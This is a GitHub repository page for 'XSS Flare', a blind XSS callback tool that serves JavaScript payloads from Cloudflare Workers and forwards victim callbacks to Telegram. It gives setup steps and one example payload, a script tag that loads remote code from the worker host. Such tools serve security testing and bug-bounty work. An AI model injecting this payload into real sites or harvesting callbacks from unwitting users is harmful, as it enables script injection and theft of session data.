Skip to content
XSS hunter on cloudflare serverless workers.
Branch: master
Clone or download
Latest commit 1a89501 Oct 12, 2019
Type Name Latest commit message Commit time
Failed to load latest commit information.
LICENSE First commit Sep 12, 2019 First commit Sep 12, 2019
flare-template.html First commit Sep 12, 2019
flare.js Caption title added Oct 12, 2019
index.js Caption title added Oct 12, 2019
screenshot.png First commit Sep 12, 2019

XSS Flare

XSS hunter ported on cloudflare serverless workers ! This script serves JS payloads from cloudflare workers and redirects the incoming callbacks to telegram. (Telegram bot token is not exposed to victims) It generates blind XSS reports that looks like this.



  1. Login to your cloudflare account and create a serverless worker.
  2. Replace the BotToken and ChatID values inside the index.js file.
  3. Paste the index.js contents into the cloudflare worker script editor.
  4. Click Save and Deploy. All done !

Here is an example blind XSS payload.

<script src="https://[your.workername]"></script>
You can’t perform that action at this time.